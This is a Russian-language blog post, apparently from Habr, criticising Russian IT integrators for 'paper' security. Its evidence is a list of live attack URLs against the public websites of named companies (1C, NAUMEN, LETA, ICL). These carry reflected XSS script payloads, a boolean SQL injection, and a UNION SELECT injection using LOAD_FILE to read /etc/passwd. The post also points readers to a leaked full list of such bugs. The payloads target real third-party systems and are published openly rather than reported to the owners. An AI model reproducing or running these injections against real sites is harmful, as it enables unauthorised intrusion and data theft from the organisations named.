Бумажные специалисты. Часть 2. Интеграторы

Продолжая мысль про «бумажных специалистов» обсуждаемую на хабре: http://habrahabr.ru/post/169491/ ^[1] хочется отметить, что помимо специалистов по ИБ есть еще и интеграторы. И с ними ситуация не лучше.

Чем занимается фирма 1С думаю не нужно рассказывать.
1c.ru/search/search.cgi?wm=-- ^[2]>&wf=2221&GroupBySite=no&ul=http://www.1c.ru&q=1&cmd=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA
Здесь компания 1C несколько раз приветствует вас активной XSS уязвимостью

www.1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=1%27%20or%20%271%27=%271 ^[3]
По этому адресу фирма 1С любезно предлагает ознакомиться с курсом валют, а заодно и со всей базой данных через SQL инъекцию.

Компания NAUMEN — ведущий российский разработчик программных решений для бизнеса и органов власти. Страх и ужас.

http://www.naumen.ru/clients?filter=s_9999 union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&show_comments=1 ^[4]

www.naumen.ru/tests/ ^[5]

LETA IT-company – один из лидеров рынка информационной безопасности в России, первый оператор типизированных ИТ-услуг. Компания работает на российском рынке информационных технологий начиная с 2003 года.

www.letagroup.ru/rus/library/?company=21%22/a%3E%3Cscript%3Ealert%281001000%29%3C/script%3E ^[6]

ICL-КПО ВС — ведущая российская компания, предоставляющая комплексные решения в области информационных технологий и услуги по консалтингу, проектированию, внедрению, гарантийному и сервисному обслуживанию информационных систем любого масштаба.
www.icl.ru/web/guest/about?p_p_id=82&p_p_action=1&p_p_state=normal&p_p_mode=%3Cscript%3Ealert%28%27hello%20habr%27%29%3C/script%3E&p_p_col_id=1&p_p_col_pos=0&p_p_col_count=0&_82_struts_action=/language/view&languageId=ru_RU ^[7]

Данная статья не призывает совершать противоправные действия, она лишь констатирует очень плохую тенденцию на рынке ИБ в России. Наверху озабочены в основном соответствием нормативам и получением сертификатов, а внизу в копилках копятся баги. Такая ситуация ни к чему хорошему не приведет. В выигрыше от такого положения дел только киберкриминал.

Недавно в твиттере возникла дискуссия на тему третьей мировой, так вот я считаю, что, если она и будет, то она будет в основном кибервойной. И мы, как страна, к ней категорически не готовы, потому что безопасность у нас в основном на бумаге.

Оригинальный текст и полный список багов. ^[8] Проверять все ошибки у меня нет ни времени, ни желания. Просьба поделиться инвайтом на хабр c человеком слившим все эти баги. Почта для инвайта habrleaks@mail.

Автор: 090h

Источник ^[9]